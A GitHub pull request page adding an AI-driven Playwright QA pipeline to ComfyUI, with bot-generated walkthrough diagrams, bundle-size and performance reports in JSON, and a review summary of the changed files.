feat: add automated QA pipeline with E2E test-driven bug reproduction#10835
feat: add automated QA pipeline with E2E test-driven bug reproduction#10835
Conversation
Three-phase pipeline triggered by labels (qa-changes, qa-full, qa-issue): 1. Research: Claude writes Playwright E2E tests to reproduce reported bugs 2. Reproduce: Deterministic replay with video recording 3. Report: Deploy results to Cloudflare Pages with badges Key design decisions: - Playwright assertions are source of truth (not AI vision) - Agent has readFixture/readTest tools to discover project patterns - Bug-specific assertions required (trivial assertions banned) - Main branch dist cached by SHA to speed up before/after comparisons - QA deps installed inline in CI (no package.json changes needed) Verified across 48 runs (22 PRs + 26 issues) with 0 false positives. Amp-Thread-ID: https://ampcode.com/threads/T-019d519b-004f-71ce-b970-96edd971fbe0 Co-authored-by: Amp <amp@ampcode.com> Amp-Thread-ID: https://ampcode.com/threads/T-019d519b-004f-71ce-b970-96edd971fbe0 Co-authored-by: Amp <amp@ampcode.com>
🎭 Playwright: ✅ 937 passed, 0 failed · 4 flaky📊 Browser Reports
|
📝 WalkthroughWalkthroughThis pull request introduces a complete end-to-end QA pipeline for ComfyUI that automates testing of pull requests and issues. It combines Playwright-based browser automation, AI-powered analysis via Gemini and Claude APIs, video recording and processing, and deployment to Cloudflare Pages. The system orchestrates multi-phase workflows: PR analysis, deterministic video recording (before/after), agent-driven reproduction testing, and structured report generation with artifacts. Changes
Sequence DiagramssequenceDiagram
participant GH as GitHub (PR/Issue)
participant CI as GitHub Actions
participant Gemini as Gemini API
participant Claude as Claude API
participant PW as Playwright
participant ComfyUI as ComfyUI Server
participant Pages as Cloudflare Pages
GH->>CI: Label trigger (PR QA)
CI->>Gemini: qa-analyze-pr (fetch PR diff/issue)
Gemini->>CI: QA guides (before/after)
par Before Recording
CI->>PW: Start browser (main branch)
PW->>ComfyUI: Navigate to UI
CI->>Gemini: Generate action plan
Gemini->>CI: Actions JSON
CI->>PW: Execute actions + record
PW->>ComfyUI: Interact with UI
PW->>CI: WebM video + screenshots
and After Recording
CI->>PW: Start browser (PR branch)
PW->>ComfyUI: Navigate to UI
CI->>Gemini: Generate action plan (with diff)
Gemini->>CI: Actions JSON
CI->>PW: Execute actions + record
PW->>ComfyUI: Interact with UI
PW->>CI: WebM video + screenshots
end
CI->>Gemini: qa-video-review (before/after MP4)
Gemini->>CI: Platform-specific QA reports (Markdown)
CI->>Gemini: qa-generate-test (report + diff)
Gemini->>CI: Regression test spec
CI->>Pages: Deploy HTML report + badge
CI->>GH: Post/update unified QA comment
sequenceDiagram
participant Agent as Claude Agent
participant MCP as MCP Tools
participant PW as Playwright Page
participant FS as File System
participant Test as Playwright Test Runner
Agent->>MCP: inspect (read aria snapshot)
MCP->>PW: page.evaluate (getAriaSnapshot)
PW->>Agent: Accessibility tree
Agent->>MCP: readFixture / readTest
MCP->>FS: Load test templates
FS->>Agent: Template code
Agent->>MCP: writeTest (reproduce.spec.ts)
MCP->>FS: Write test file
Agent->>MCP: runTest
MCP->>Test: npx playwright test
Test->>PW: Execute assertions
PW->>Test: Pass/Fail result
Test->>MCP: Output + test code
MCP->>Agent: Test result + code
alt Test Passed
Agent->>MCP: done (verdict=REPRODUCED)
MCP->>FS: Save final test code
else Test Failed
Agent->>Agent: Iterate (refine test)
end
MCP->>FS: Write research-log.json
Estimated code review effort🎯 4 (Complex) | ⏱️ ~60 minutes Poem
🚥 Pre-merge checks | ✅ 4 | ❌ 1❌ Failed checks (1 warning)
✅ Passed checks (4 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches📝 Generate docstrings
🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
🎨 Storybook: ✅ Built — View Storybook |
|
Review the following changes in direct dependencies. Learn more about Socket for GitHub.
|
|
Warning Review the following alerts detected in dependencies. According to your organization's Security Policy, it is recommended to resolve "Warn" alerts. Learn more about Socket for GitHub.
|
📦 Bundle: 5.11 MB gzip 🔴 +14 BDetailsSummary
Category Glance App Entry Points — 22.3 kB (baseline 22.3 kB) • ⚪ 0 BMain entry bundles and manifests
Status: 1 added / 1 removed Graph Workspace — 1.2 MB (baseline 1.2 MB) • ⚪ 0 BGraph editor runtime, canvas, workflow orchestration
Status: 1 added / 1 removed Views & Navigation — 76.6 kB (baseline 76.6 kB) • ⚪ 0 BTop-level views, pages, and routed surfaces
Status: 9 added / 9 removed / 2 unchanged Panels & Settings — 484 kB (baseline 484 kB) • ⚪ 0 BConfiguration panels, inspectors, and settings screens
Status: 10 added / 10 removed / 12 unchanged User & Accounts — 17.1 kB (baseline 17.1 kB) • ⚪ 0 BAuthentication, profile, and account management bundles
Status: 5 added / 5 removed / 2 unchanged Editors & Dialogs — 109 kB (baseline 109 kB) • ⚪ 0 BModals, dialogs, drawers, and in-app editors
Status: 2 added / 2 removed UI Components — 60.3 kB (baseline 60.3 kB) • ⚪ 0 BReusable component library chunks
Status: 5 added / 5 removed / 8 unchanged Data & Services — 2.97 MB (baseline 2.97 MB) • ⚪ 0 BStores, services, APIs, and repositories
Status: 13 added / 13 removed / 4 unchanged Utilities & Hooks — 338 kB (baseline 338 kB) • ⚪ 0 BHelpers, composables, and utility bundles
Status: 13 added / 13 removed / 13 unchanged Vendor & Third-Party — 9.8 MB (baseline 9.8 MB) • ⚪ 0 BExternal libraries and shared vendor chunks Status: 16 unchanged Other — 8.44 MB (baseline 8.44 MB) • ⚪ 0 BBundles that do not match a named category
Status: 55 added / 55 removed / 79 unchanged ⚡ Performance Report
No regressions detected. All metrics
Historical variance (last 15 runs)
Trend (last 15 commits on main)
Raw data{
"timestamp": "2026-04-03T05:08:39.617Z",
"gitSha": "9572c0ed53ce73a7180115c5ef014afdc2021be6",
"branch": "sno-qa-clean",
"measurements": [
{
"name": "canvas-idle",
"durationMs": 1998.2589999999618,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.656,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 337.768,
"heapDeltaBytes": 19934872,
"heapUsedBytes": 63135768,
"domNodes": 19,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 14.658000000000001,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "canvas-idle",
"durationMs": 2036.7129999999634,
"styleRecalcs": 12,
"styleRecalcDurationMs": 10.223,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 346.37,
"heapDeltaBytes": 21125204,
"heapUsedBytes": 64742272,
"domNodes": 23,
"jsHeapTotalBytes": 22806528,
"scriptDurationMs": 22.491,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-idle",
"durationMs": 2020.6009999999424,
"styleRecalcs": 11,
"styleRecalcDurationMs": 8.922,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 343.443,
"heapDeltaBytes": 20328080,
"heapUsedBytes": 63100352,
"domNodes": 22,
"jsHeapTotalBytes": 22806528,
"scriptDurationMs": 21.687000000000005,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-mouse-sweep",
"durationMs": 1770.7439999999792,
"styleRecalcs": 73,
"styleRecalcDurationMs": 35.163,
"layouts": 12,
"layoutDurationMs": 3.312,
"taskDurationMs": 727.598,
"heapDeltaBytes": 15925300,
"heapUsedBytes": 58768264,
"domNodes": 56,
"jsHeapTotalBytes": 23330816,
"scriptDurationMs": 129.001,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.670000000000012,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-mouse-sweep",
"durationMs": 1758.3759999999984,
"styleRecalcs": 73,
"styleRecalcDurationMs": 33.719,
"layouts": 12,
"layoutDurationMs": 3.407,
"taskDurationMs": 722.924,
"heapDeltaBytes": 15985360,
"heapUsedBytes": 58792056,
"domNodes": 56,
"jsHeapTotalBytes": 23592960,
"scriptDurationMs": 131.686,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66999999999998,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-mouse-sweep",
"durationMs": 2010.4619999999613,
"styleRecalcs": 84,
"styleRecalcDurationMs": 40.824,
"layouts": 12,
"layoutDurationMs": 3.172,
"taskDurationMs": 935.859,
"heapDeltaBytes": 16246276,
"heapUsedBytes": 58814876,
"domNodes": 66,
"jsHeapTotalBytes": 22544384,
"scriptDurationMs": 132.798,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-zoom-sweep",
"durationMs": 1722.0749999999612,
"styleRecalcs": 32,
"styleRecalcDurationMs": 15.168,
"layouts": 6,
"layoutDurationMs": 0.4990000000000001,
"taskDurationMs": 273.01,
"heapDeltaBytes": 24433148,
"heapUsedBytes": 67512736,
"domNodes": 78,
"jsHeapTotalBytes": 20971520,
"scriptDurationMs": 17.031000000000006,
"eventListeners": 19,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "canvas-zoom-sweep",
"durationMs": 1736.4389999999048,
"styleRecalcs": 32,
"styleRecalcDurationMs": 16.105,
"layouts": 6,
"layoutDurationMs": 0.4940000000000001,
"taskDurationMs": 284.696,
"heapDeltaBytes": 24964932,
"heapUsedBytes": 67485976,
"domNodes": 79,
"jsHeapTotalBytes": 20185088,
"scriptDurationMs": 21.826,
"eventListeners": 19,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "canvas-zoom-sweep",
"durationMs": 1754.203000000075,
"styleRecalcs": 33,
"styleRecalcDurationMs": 15.938999999999998,
"layouts": 6,
"layoutDurationMs": 0.5579999999999999,
"taskDurationMs": 290.70300000000003,
"heapDeltaBytes": 24942656,
"heapUsedBytes": 67801192,
"domNodes": 80,
"jsHeapTotalBytes": 20447232,
"scriptDurationMs": 21.585,
"eventListeners": 19,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "dom-widget-clipping",
"durationMs": 642.0259999999871,
"styleRecalcs": 12,
"styleRecalcDurationMs": 9.486999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 390.153,
"heapDeltaBytes": 6805092,
"heapUsedBytes": 49709164,
"domNodes": 20,
"jsHeapTotalBytes": 12845056,
"scriptDurationMs": 70.19200000000001,
"eventListeners": 2,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "dom-widget-clipping",
"durationMs": 547.5030000000061,
"styleRecalcs": 14,
"styleRecalcDurationMs": 9.804,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 345.288,
"heapDeltaBytes": -3390388,
"heapUsedBytes": 47546956,
"domNodes": 23,
"jsHeapTotalBytes": 15728640,
"scriptDurationMs": 66.56300000000002,
"eventListeners": 2,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "dom-widget-clipping",
"durationMs": 559.0859999999793,
"styleRecalcs": 13,
"styleRecalcDurationMs": 9.216000000000001,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 336.03399999999993,
"heapDeltaBytes": 6265300,
"heapUsedBytes": 49038260,
"domNodes": 22,
"jsHeapTotalBytes": 13631488,
"scriptDurationMs": 66.77999999999999,
"eventListeners": 2,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "large-graph-idle",
"durationMs": 2028.2190000000355,
"styleRecalcs": 12,
"styleRecalcDurationMs": 10.593,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 551.837,
"heapDeltaBytes": 5273208,
"heapUsedBytes": 56263192,
"domNodes": -254,
"jsHeapTotalBytes": 16445440,
"scriptDurationMs": 101.51,
"eventListeners": -121,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "large-graph-idle",
"durationMs": 2055.7730000000447,
"styleRecalcs": 11,
"styleRecalcDurationMs": 10.899000000000003,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 538.865,
"heapDeltaBytes": 4673928,
"heapUsedBytes": 55547192,
"domNodes": -256,
"jsHeapTotalBytes": 16707584,
"scriptDurationMs": 96.45,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "large-graph-idle",
"durationMs": 2028.5599999999704,
"styleRecalcs": 11,
"styleRecalcDurationMs": 9.489999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 524.6999999999999,
"heapDeltaBytes": 4602704,
"heapUsedBytes": 55574788,
"domNodes": -254,
"jsHeapTotalBytes": 16445440,
"scriptDurationMs": 95.72900000000001,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "large-graph-pan",
"durationMs": 2134.890999999982,
"styleRecalcs": 69,
"styleRecalcDurationMs": 15.238999999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 1021.2570000000001,
"heapDeltaBytes": 16769236,
"heapUsedBytes": 70311136,
"domNodes": -261,
"jsHeapTotalBytes": 18485248,
"scriptDurationMs": 383.017,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "large-graph-pan",
"durationMs": 2180.7959999999866,
"styleRecalcs": 71,
"styleRecalcDurationMs": 17.068,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 1131.092,
"heapDeltaBytes": 20380828,
"heapUsedBytes": 72108592,
"domNodes": -258,
"jsHeapTotalBytes": 19271680,
"scriptDurationMs": 438.356,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "large-graph-pan",
"durationMs": 2165.986999999973,
"styleRecalcs": 69,
"styleRecalcDurationMs": 16.211,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 1052.0880000000002,
"heapDeltaBytes": 16169676,
"heapUsedBytes": 68386048,
"domNodes": -258,
"jsHeapTotalBytes": 17174528,
"scriptDurationMs": 387.807,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "large-graph-zoom",
"durationMs": 3134.779999999978,
"styleRecalcs": 66,
"styleRecalcDurationMs": 16.475,
"layouts": 60,
"layoutDurationMs": 7.188,
"taskDurationMs": 1259.287,
"heapDeltaBytes": 4724096,
"heapUsedBytes": 60701136,
"domNodes": -264,
"jsHeapTotalBytes": 16502784,
"scriptDurationMs": 462.33000000000004,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "large-graph-zoom",
"durationMs": 3134.8410000000513,
"styleRecalcs": 65,
"styleRecalcDurationMs": 14.546000000000003,
"layouts": 60,
"layoutDurationMs": 7.137,
"taskDurationMs": 1278.661,
"heapDeltaBytes": 9120024,
"heapUsedBytes": 64284656,
"domNodes": -265,
"jsHeapTotalBytes": 15921152,
"scriptDurationMs": 470.9070000000001,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "large-graph-zoom",
"durationMs": 3144.549999999981,
"styleRecalcs": 66,
"styleRecalcDurationMs": 16.902,
"layouts": 60,
"layoutDurationMs": 7.0219999999999985,
"taskDurationMs": 1272.7520000000002,
"heapDeltaBytes": 7357748,
"heapUsedBytes": 61914256,
"domNodes": -264,
"jsHeapTotalBytes": 17494016,
"scriptDurationMs": 479.054,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "minimap-idle",
"durationMs": 2022.4600000000237,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.335000000000003,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 504.01300000000003,
"heapDeltaBytes": 4106484,
"heapUsedBytes": 56494652,
"domNodes": -258,
"jsHeapTotalBytes": 16183296,
"scriptDurationMs": 90.14,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "minimap-idle",
"durationMs": 2051.6680000000633,
"styleRecalcs": 11,
"styleRecalcDurationMs": 9.031999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 522.0409999999999,
"heapDeltaBytes": 4539680,
"heapUsedBytes": 57742532,
"domNodes": -258,
"jsHeapTotalBytes": 16814080,
"scriptDurationMs": 90.391,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "minimap-idle",
"durationMs": 2022.2219999999425,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.401000000000002,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 561.034,
"heapDeltaBytes": 4217296,
"heapUsedBytes": 56469764,
"domNodes": -259,
"jsHeapTotalBytes": 16183296,
"scriptDurationMs": 106.021,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-dom-widget-clipping",
"durationMs": 579.9409999999625,
"styleRecalcs": 49,
"styleRecalcDurationMs": 13.391,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 373.742,
"heapDeltaBytes": 7088236,
"heapUsedBytes": 49747932,
"domNodes": 24,
"jsHeapTotalBytes": 13369344,
"scriptDurationMs": 130.244,
"eventListeners": 8,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-dom-widget-clipping",
"durationMs": 542.4820000000636,
"styleRecalcs": 48,
"styleRecalcDurationMs": 11.611,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 344.442,
"heapDeltaBytes": 6389312,
"heapUsedBytes": 50722384,
"domNodes": 22,
"jsHeapTotalBytes": 14155776,
"scriptDurationMs": 120.56599999999999,
"eventListeners": 8,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.663333333333338,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-dom-widget-clipping",
"durationMs": 538.579000000027,
"styleRecalcs": 49,
"styleRecalcDurationMs": 11.880999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 346.48,
"heapDeltaBytes": -2033056,
"heapUsedBytes": 49349220,
"domNodes": 23,
"jsHeapTotalBytes": 15728640,
"scriptDurationMs": 121.666,
"eventListeners": 8,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "subgraph-idle",
"durationMs": 1997.000000000014,
"styleRecalcs": 11,
"styleRecalcDurationMs": 9.384,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 335.692,
"heapDeltaBytes": 19988852,
"heapUsedBytes": 63080348,
"domNodes": 21,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 17.924000000000003,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "subgraph-idle",
"durationMs": 1997.2669999999653,
"styleRecalcs": 11,
"styleRecalcDurationMs": 10.145999999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 336.116,
"heapDeltaBytes": 20642744,
"heapUsedBytes": 64880820,
"domNodes": 22,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 16.5,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "subgraph-idle",
"durationMs": 2017.0049999999264,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.296999999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 318.668,
"heapDeltaBytes": 20216044,
"heapUsedBytes": 63420524,
"domNodes": 20,
"jsHeapTotalBytes": 22544384,
"scriptDurationMs": 16.066,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-mouse-sweep",
"durationMs": 1691.3119999999822,
"styleRecalcs": 77,
"styleRecalcDurationMs": 37.409000000000006,
"layouts": 16,
"layoutDurationMs": 4.475999999999999,
"taskDurationMs": 637.0140000000001,
"heapDeltaBytes": 11584472,
"heapUsedBytes": 54301460,
"domNodes": 64,
"jsHeapTotalBytes": 23592960,
"scriptDurationMs": 94.028,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-mouse-sweep",
"durationMs": 1988.2539999999835,
"styleRecalcs": 89,
"styleRecalcDurationMs": 45.725,
"layouts": 16,
"layoutDurationMs": 4.601,
"taskDurationMs": 909.1500000000001,
"heapDeltaBytes": 11897152,
"heapUsedBytes": 55095004,
"domNodes": 75,
"jsHeapTotalBytes": 22544384,
"scriptDurationMs": 96.61200000000001,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "subgraph-mouse-sweep",
"durationMs": 1688.3649999999761,
"styleRecalcs": 76,
"styleRecalcDurationMs": 38.134,
"layouts": 16,
"layoutDurationMs": 4.841,
"taskDurationMs": 665.9920000000001,
"heapDeltaBytes": 12346640,
"heapUsedBytes": 55328876,
"domNodes": 63,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 98.533,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "viewport-pan-sweep",
"durationMs": 8144.541999999945,
"styleRecalcs": 250,
"styleRecalcDurationMs": 42.02,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 3464.192,
"heapDeltaBytes": 24982320,
"heapUsedBytes": 75780152,
"domNodes": -257,
"jsHeapTotalBytes": 19271680,
"scriptDurationMs": 1199.3770000000002,
"eventListeners": -109,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.670000000000012,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "viewport-pan-sweep",
"durationMs": 8181.407000000036,
"styleRecalcs": 252,
"styleRecalcDurationMs": 43.745999999999995,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 3503.9120000000003,
"heapDeltaBytes": 17355696,
"heapUsedBytes": 68290264,
"domNodes": -254,
"jsHeapTotalBytes": 20320256,
"scriptDurationMs": 1209.86,
"eventListeners": -111,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.80000000000109
},
{
"name": "viewport-pan-sweep",
"durationMs": 8145.138999999972,
"styleRecalcs": 252,
"styleRecalcDurationMs": 42.138,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 3534.386,
"heapDeltaBytes": 25530960,
"heapUsedBytes": 75857940,
"domNodes": -254,
"jsHeapTotalBytes": 19009536,
"scriptDurationMs": 1215.641,
"eventListeners": -107,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.80000000000109
},
{
"name": "vue-large-graph-idle",
"durationMs": 11890.125000000011,
"styleRecalcs": 0,
"styleRecalcDurationMs": 0,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 11880.043,
"heapDeltaBytes": -30918872,
"heapUsedBytes": 166843080,
"domNodes": -8331,
"jsHeapTotalBytes": 28139520,
"scriptDurationMs": 567.561,
"eventListeners": -16464,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.220000000000073,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-idle",
"durationMs": 11777.085999999941,
"styleRecalcs": 0,
"styleRecalcDurationMs": 0,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 11762.448,
"heapDeltaBytes": -34360624,
"heapUsedBytes": 159497492,
"domNodes": -8331,
"jsHeapTotalBytes": 19750912,
"scriptDurationMs": 573.4050000000001,
"eventListeners": -16464,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.223333333333358,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-idle",
"durationMs": 11883.965000000102,
"styleRecalcs": 0,
"styleRecalcDurationMs": 0,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 11872.829,
"heapDeltaBytes": -39893352,
"heapUsedBytes": 166265172,
"domNodes": -8331,
"jsHeapTotalBytes": 27090944,
"scriptDurationMs": 574.331,
"eventListeners": -16464,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.223333333333358,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-pan",
"durationMs": 14303.716000000008,
"styleRecalcs": 68,
"styleRecalcDurationMs": 13.810000000000016,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 14282.717,
"heapDeltaBytes": -46113528,
"heapUsedBytes": 148080556,
"domNodes": -8333,
"jsHeapTotalBytes": -2269184,
"scriptDurationMs": 837.723,
"eventListeners": -16488,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.219999999999953,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-pan",
"durationMs": 14238.937000000078,
"styleRecalcs": 64,
"styleRecalcDurationMs": 13.738,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 14220.278,
"heapDeltaBytes": -6789188,
"heapUsedBytes": 187132276,
"domNodes": -8331,
"jsHeapTotalBytes": 26480640,
"scriptDurationMs": 887.7140000000002,
"eventListeners": -16462,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.220000000000073,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "vue-large-graph-pan",
"durationMs": 13982.488999999987,
"styleRecalcs": 65,
"styleRecalcDurationMs": 13.39399999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 13964.07,
"heapDeltaBytes": -15852344,
"heapUsedBytes": 186113008,
"domNodes": -8333,
"jsHeapTotalBytes": 26218496,
"scriptDurationMs": 869.948,
"eventListeners": -16462,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.776666666666642,
"p95FrameDurationMs": 16.80000000000291
},
{
"name": "workflow-execution",
"durationMs": 438.7659999999869,
"styleRecalcs": 19,
"styleRecalcDurationMs": 24.655,
"layouts": 4,
"layoutDurationMs": 1.138,
"taskDurationMs": 114.069,
"heapDeltaBytes": 4624668,
"heapUsedBytes": 48901388,
"domNodes": 168,
"jsHeapTotalBytes": 0,
"scriptDurationMs": 23.330000000000002,
"eventListeners": 71,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "workflow-execution",
"durationMs": 96.63000000000466,
"styleRecalcs": 11,
"styleRecalcDurationMs": 17.773999999999997,
"layouts": 5,
"layoutDurationMs": 1.688,
"taskDurationMs": 82.58799999999998,
"heapDeltaBytes": 2719244,
"heapUsedBytes": 47399020,
"domNodes": 141,
"jsHeapTotalBytes": 524288,
"scriptDurationMs": 20.515999999999995,
"eventListeners": 37,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.663333333333338,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "workflow-execution",
"durationMs": 456.0999999999922,
"styleRecalcs": 18,
"styleRecalcDurationMs": 24.045000000000005,
"layouts": 5,
"layoutDurationMs": 1.3200000000000003,
"taskDurationMs": 119.387,
"heapDeltaBytes": 4516176,
"heapUsedBytes": 49196084,
"domNodes": 157,
"jsHeapTotalBytes": 262144,
"scriptDurationMs": 29.253,
"eventListeners": 71,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
}
]
} |
There was a problem hiding this comment.
Pull request overview
Adds a label-triggered automated QA pipeline that records Playwright E2E sessions, performs AI-assisted before/after review, and publishes an artifact site (videos + badge + report) to Cloudflare Pages.
Changes:
- Introduces a GitHub Actions workflow (
pr-qa.yaml) to run focused/full QA flows, generate reports, deploy to Pages, and comment back on PRs/issues. - Adds supporting QA scripts for PR/issue analysis, test generation, deterministic replay/narration, and video review.
- Adds documentation and config updates to support the new QA pipeline and CI-only dependencies.
Reviewed changes
Copilot reviewed 18 out of 18 changed files in this pull request and generated 7 comments.
Show a summary per file
| File | Description |
|---|---|
.github/workflows/pr-qa.yaml |
Orchestrates the multi-phase QA pipeline, artifact collection, deployment, and commenting. |
scripts/qa-agent.ts |
Claude-driven research phase that writes/runs Playwright tests to reproduce bugs. |
scripts/qa-analyze-pr.ts |
Fetches PR/issue context, extracts media, and generates QA guides via Gemini. |
scripts/qa-analyze-pr.test.ts |
Unit tests for media URL extraction logic used by PR/issue analysis. |
